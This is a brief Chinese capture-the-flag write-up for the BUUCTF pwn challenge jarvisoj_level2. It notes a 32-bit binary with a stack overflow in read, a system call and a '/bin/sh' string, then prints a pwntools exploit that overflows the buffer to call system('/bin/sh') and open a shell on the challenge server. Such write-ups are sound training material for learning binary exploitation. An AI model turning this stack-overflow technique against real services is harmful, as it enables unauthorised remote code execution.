[BUUCTF-pwn]——jarvisoj_level2

[BUUCTF-pwn]——jarvisoj_level2

checksec 一下下, 32程序
[BUUCTF-pwn]——jarvisoj_level2
IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下
[BUUCTF-pwn]——jarvisoj_level2
[BUUCTF-pwn]——jarvisoj_level2
[BUUCTF-pwn]——jarvisoj_level2
[BUUCTF-pwn]——jarvisoj_level2
[BUUCTF-pwn]——jarvisoj_level2
[BUUCTF-pwn]——jarvisoj_level2

exploit

from pwn import *
p = remote("node3.buuoj.cn",28375)
binsh = 0x0804A024
sys_addr = 0x0804845C
payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(binsh)
p.sendlineafter("Input:\n",payload)
p.interactive()
上一篇:BUUOJ REVERSE


下一篇:【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现